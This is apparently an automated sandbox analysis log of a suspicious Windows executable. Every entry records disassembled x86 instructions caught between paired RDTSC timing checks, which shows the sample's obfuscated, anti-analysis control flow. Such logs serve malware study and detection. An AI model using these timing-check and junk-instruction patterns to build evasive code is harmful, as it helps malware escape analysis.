Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F3F531 second address: F3F551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2F08D1BEB2h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52F0917 second address: 52F0929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov ebx, 6BC41742h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52F0929 second address: 52F092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52F092D second address: 52F0931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52F0931 second address: 52F0937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52F0937 second address: 52F09B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2F08CCF078h 0x00000009 adc cl, 00000008h 0x0000000c jmp 00007F2F08CCF06Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F2F08CCF078h 0x00000018 or ax, BA68h 0x0000001d jmp 00007F2F08CCF06Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov dword ptr [esp], ebp 0x00000029 jmp 00007F2F08CCF076h 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52F09B0 second address: 52F09B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5340397 second address: 534039D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 534039D second address: 53403CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F2F08D1BEAFh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2F08D1BEB0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53403CB second address: 53403CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53403CF second address: 53403D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53403D5 second address: 53403E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F08CCF06Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52B0A9F second address: 52B0AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52B0AA3 second address: 52B0ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF077h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52B0ABE second address: 52B0B02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov di, ax 0x0000000f pushad 0x00000010 mov ebx, ecx 0x00000012 movzx ecx, dx 0x00000015 popad 0x00000016 popad 0x00000017 push dword ptr [ebp+04h] 0x0000001a jmp 00007F2F08D1BEADh 0x0000001f push dword ptr [ebp+0Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52B0B02 second address: 52B0B15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52B0B15 second address: 52B0B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52B0B1B second address: 52B0B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52F06A0 second address: 52F0723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F2F08D1BEB7h 0x0000000b or ch, FFFFFF8Eh 0x0000000e jmp 00007F2F08D1BEB9h 0x00000013 popfd 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 push ecx 0x00000018 mov edi, 0BC26CEEh 0x0000001d pop ebx 0x0000001e pushfd 0x0000001f jmp 00007F2F08D1BEB4h 0x00000024 or esi, 0F5FED38h 0x0000002a jmp 00007F2F08D1BEABh 0x0000002f popfd 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F2F08D1BEB4h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52F0723 second address: 52F0735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F08CCF06Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52F0735 second address: 52F075A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, 443Fh 0x00000010 jmp 00007F2F08D1BEB4h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0875 second address: 52E0879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0879 second address: 52E087F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E087F second address: 52E08F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF072h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2F08CCF070h 0x0000000f push eax 0x00000010 jmp 00007F2F08CCF06Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F2F08CCF076h 0x0000001b mov ebp, esp 0x0000001d jmp 00007F2F08CCF070h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F2F08CCF077h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E08F5 second address: 52E091E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2F08D1BEAFh 0x00000009 jmp 00007F2F08D1BEB3h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53309EC second address: 53309F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53309F2 second address: 53309F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 533086A second address: 53308A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF075h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2F08CCF078h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53308A0 second address: 53308A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53308A4 second address: 53308AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53308AA second address: 53308EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2F08D1BEACh 0x00000009 and ah, 00000068h 0x0000000c jmp 00007F2F08D1BEABh 0x00000011 popfd 0x00000012 mov esi, 5154095Fh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d pushad 0x0000001e movzx eax, dx 0x00000021 movsx ebx, ax 0x00000024 popad 0x00000025 mov ebx, eax 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F2F08D1BEADh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53308EF second address: 53308F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 533067F second address: 5330685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5330685 second address: 5330689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5330689 second address: 533069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2F08D1BEABh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 533069F second address: 53306A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53306A5 second address: 53306A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53306A9 second address: 53306AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53306AD second address: 53306D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2F08D1BEB8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53306D2 second address: 53306D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53306D6 second address: 53306DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53306DC second address: 53306E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53306E1 second address: 533071F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 10E055C9h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F2F08D1BEB4h 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 mov bx, si 0x00000018 movzx ecx, bx 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F2F08D1BEB0h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5330D15 second address: 5330D89 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2F08CCF076h 0x00000008 jmp 00007F2F08CCF075h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F2F08CCF070h 0x00000015 popad 0x00000016 mov eax, dword ptr [ebp+08h] 0x00000019 jmp 00007F2F08CCF070h 0x0000001e and dword ptr [eax], 00000000h 0x00000021 jmp 00007F2F08CCF070h 0x00000026 and dword ptr [eax+04h], 00000000h 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov ecx, 1E05D813h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5330D89 second address: 5330DC5 instructions: 0x00000000 rdtsc 0x00000002 call 00007F2F08D1BEB8h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov al, bl 0x0000000c popad 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2F08D1BEB9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5330DC5 second address: 5330DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5330DCB second address: 5330DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E078A second address: 52E07A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ch, 10h 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2F08CCF06Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E07A4 second address: 52E07BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F08D1BEB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E07BC second address: 52E07C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E07C0 second address: 52E07D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov di, si 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E07D2 second address: 52E07F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2F08CCF06Eh 0x00000009 add ax, 3068h 0x0000000e jmp 00007F2F08CCF06Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E07F7 second address: 52E0825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov bx, si 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F2F08D1BEACh 0x00000015 and ecx, 195302C8h 0x0000001b jmp 00007F2F08D1BEABh 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5330008 second address: 533000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 533000E second address: 5330014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5330014 second address: 533003F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F2F08CCF06Eh 0x00000011 push eax 0x00000012 pushad 0x00000013 movsx edx, ax 0x00000016 push eax 0x00000017 push edx 0x00000018 mov edx, eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 533003F second address: 5330060 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 5A0C818Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F2F08D1BEAEh 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5330060 second address: 533007D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 533007D second address: 5330099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5330099 second address: 533009D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 533009D second address: 53300A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53300A1 second address: 53300A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5310C71 second address: 5310CBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F2F08D1BEAEh 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2F08D1BEB7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5310CBA second address: 5310CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F08CCF074h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5310CD2 second address: 5310D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F2F08D1BEB8h 0x00000014 sub ecx, 4AB27B98h 0x0000001a jmp 00007F2F08D1BEABh 0x0000001f popfd 0x00000020 call 00007F2F08D1BEB8h 0x00000025 pop esi 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5310D25 second address: 5310D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F08CCF077h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5310D40 second address: 5310D4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5310D4F second address: 5310D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5310D53 second address: 5310D61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5310D61 second address: 5310D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5300598 second address: 530059E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 530059E second address: 53005A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53005A2 second address: 53005A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53005A6 second address: 53005E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F2F08CCF079h 0x00000012 sbb cl, FFFFFFB6h 0x00000015 jmp 00007F2F08CCF071h 0x0000001a popfd 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 53005E4 second address: 5300615 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2F08D1BEADh 0x00000008 mov ah, 9Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2F08D1BEB5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5300615 second address: 5300619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5300619 second address: 530061F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 530061F second address: 530064A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2F08CCF077h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C004C second address: 52C0072 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2F08D1BEADh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C0072 second address: 52C0151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007F2F08CCF06Eh 0x00000011 xchg eax, ecx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F2F08CCF06Eh 0x00000019 adc eax, 098E7458h 0x0000001f jmp 00007F2F08CCF06Bh 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F2F08CCF078h 0x0000002b or si, FEB8h 0x00000030 jmp 00007F2F08CCF06Bh 0x00000035 popfd 0x00000036 popad 0x00000037 push eax 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F2F08CCF06Fh 0x0000003f add esi, 32CC507Eh 0x00000045 jmp 00007F2F08CCF079h 0x0000004a popfd 0x0000004b pushfd 0x0000004c jmp 00007F2F08CCF070h 0x00000051 add ax, 2378h 0x00000056 jmp 00007F2F08CCF06Bh 0x0000005b popfd 0x0000005c popad 0x0000005d xchg eax, ecx 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F2F08CCF072h 0x00000066 rdtsc
